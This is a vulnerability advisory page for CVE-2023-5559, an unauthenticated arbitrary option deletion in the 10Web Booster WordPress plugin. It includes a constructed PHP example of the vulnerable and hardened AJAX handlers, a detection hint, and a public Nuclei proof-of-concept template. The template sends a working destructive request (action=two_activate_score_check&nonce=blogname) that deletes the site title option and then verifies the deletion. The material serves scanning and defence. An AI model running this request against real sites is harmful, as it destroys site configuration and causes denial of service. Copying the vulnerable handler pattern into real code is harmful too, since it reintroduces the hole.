CVE-2023-5559: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion

Date: 2025-08-01 | Affected software: 10Web Booster | PoC: public

Vulnerability description

The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.
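The bug class described above, shown as an added PHP illustration constructed for this page (not the plugin's actual code; the `example_` action, function and option names are hypothetical): an AJAX handler exposed to unauthenticated users that deletes whatever option name the request supplies, beside a hardened handler that verifies a real nonce, checks a capability, and only ever deletes an allow-listed option it owns.

```php
<?php
// Vulnerable pattern (constructed): registered with wp_ajax_nopriv_, so no login
// is needed, and the "nonce" parameter is used directly as an option name.
add_action( 'wp_ajax_nopriv_example_score_check', 'example_score_check_vulnerable' );
function example_score_check_vulnerable() {
    // Sanitizing is not validating: any option name survives this, so a request
    // with nonce=blogname removes the site title, and siteurl or home would
    // break the site. The value is never checked as an actual nonce.
    $option = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';
    delete_option( $option );
    wp_send_json_success();
}

// Hardened form: logged-in users only, a verified nonce, a capability check, and
// the option name comes from a fixed allow-list, never from the request.
add_action( 'wp_ajax_example_score_check', 'example_score_check_hardened' );
function example_score_check_hardened() {
    // Ends the request with HTTP 403 unless a valid nonce for this action is sent.
    check_ajax_referer( 'example_score_check', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // The client picks a key; the mapped option names are plugin-owned constants.
    $allowed = array(
        'score' => 'example_plugin_score_cache',
        'stats' => 'example_plugin_stats_cache',
    );
    $key = isset( $_POST['target'] ) ? sanitize_key( wp_unslash( $_POST['target'] ) ) : '';
    if ( ! isset( $allowed[ $key ] ) ) {
        wp_send_json_error( 'unknown target', 400 );
    }

    delete_option( $allowed[ $key ] );
    wp_send_json_success();
}
```

For detection, an admin-ajax.php POST from an unauthenticated client whose parameters carry a core option name such as blogname, siteurl or home is the signal to alert on; the template below uses exactly that shape.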

PoC code [public]

id: CVE-2023-5559

info:
  name: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion
  author: daffainfo
  severity: critical
  description: |
    The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.
  reference:
    - https://wpscan.com/vulnerability/eba46f7d-e4db-400c-8032-015f21087bbf/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5559
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-5559
    epss-score: 0.50245
    epss-percentile: 0.97695
    cpe: cpe:2.3:a:10web:10web_booster:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: 10web_booster
    framework: wordpress
    publicwww-query: "/wp-content/plugins/tenweb-speed-optimizer"
  tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive,vuln

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "{\"name\":\"", "\"description\":")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=two_activate_score_check&nonce=blogname

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"name\":false")'
        condition: and
# digest: 4a0a0047304502206b25ac91925c600120e767762a6eb5a4201762971d57eacadc461903f1eb6e8502210087283974a889592d5fde2c85f27838dc0ad06cddaa96aa3795bef10bf9e81449:922c64590222798bb761d5b6d8e72950